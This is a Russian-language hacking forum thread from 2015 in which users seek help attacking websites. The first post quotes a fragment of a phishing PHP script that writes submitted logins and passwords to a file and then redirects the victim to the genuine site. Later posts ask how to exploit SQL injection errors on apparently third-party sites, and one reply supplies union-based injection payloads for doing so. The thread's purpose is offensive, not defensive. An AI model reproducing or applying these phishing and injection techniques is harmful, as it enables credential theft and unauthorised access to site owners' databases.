 |
|
27.07.2015, 19:50
|
|
Познающий
Регистрация: 12.07.2015
Сообщений: 39
С нами:
5704886
Репутация:
0
|
|
Сообщение от None
Дальнейшая задача скрипта расположенного на удаленном сервере, заключается в приеме, обработке и сохранении POST параметров login и password. Некоторые ключевые фрагменты скрипта будут иметь следующий вид:
…
$fd = fopen($file,"a");
…
fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
…
fclose($fd);
…
echo
"
document.location.replace('
http://www.site.com/auth.html’);
" ----------------------------------------------------------------------------------------------------------------------
как именно нужно прописать этот php?
примерно так?)))
|
|
|
28.07.2015, 10:45
|
|
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами:
7553846
Репутация:
5
|
|
"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.
|
|
|
|
28.07.2015, 12:00
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от sysjuk
↑
"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.
-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.
|
|
|
|
28.07.2015, 12:59
|
|
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами:
7553846
Репутация:
5
|
|
Сообщение от BigBear
↑
-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.
Так дело в том что ничего не меняется))) Уже все перепробовал)
|
|
|
|
28.07.2015, 13:17
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от sysjuk
↑
Так дело в том что ничего не меняется))) Уже все перепробовал)
Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.
|
|
|
|
28.07.2015, 19:05
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами:
8374164
Репутация:
0
|
|
|
|
|
|
28.07.2015, 19:13
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок
|
|
|
|
29.07.2015, 08:35
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами:
8374164
Репутация:
0
|
|
Сообщение от ocheretko
↑
Эти каракули написаны в кодировке -
ISO-8859-5
, и расшифровываются как
Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок
Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .
|
|
|
|
29.07.2015, 16:53
|
|
Новичок
Регистрация: 29.07.2015
Сообщений: 5
С нами:
5680406
Репутация:
0
|
|
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43
Query invбlido: select explica from linea_explica where linea = ''''
С этим ничего как я понял нельзя сделать?
|
|
|
|
29.07.2015, 18:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
зависит от того, что вы хотите сделать.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
